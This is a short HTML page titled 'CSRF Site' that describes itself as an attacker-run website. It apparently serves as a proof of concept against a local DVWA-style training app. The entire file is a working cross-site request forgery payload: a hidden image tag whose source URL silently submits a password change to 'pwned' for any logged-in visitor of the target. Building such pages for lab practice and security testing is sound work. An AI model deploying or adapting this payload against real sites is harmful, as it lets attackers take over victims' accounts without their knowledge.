<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>CSRF Site</title>
</head>
<body>
	<p>An attacker run website</p>
	<img style="display:none" src="http://192.168.2.2/vulnerabilities/csrf/?password_new=pwned&password_conf=pwned&Change=Change" alt="">
</body>
</html>
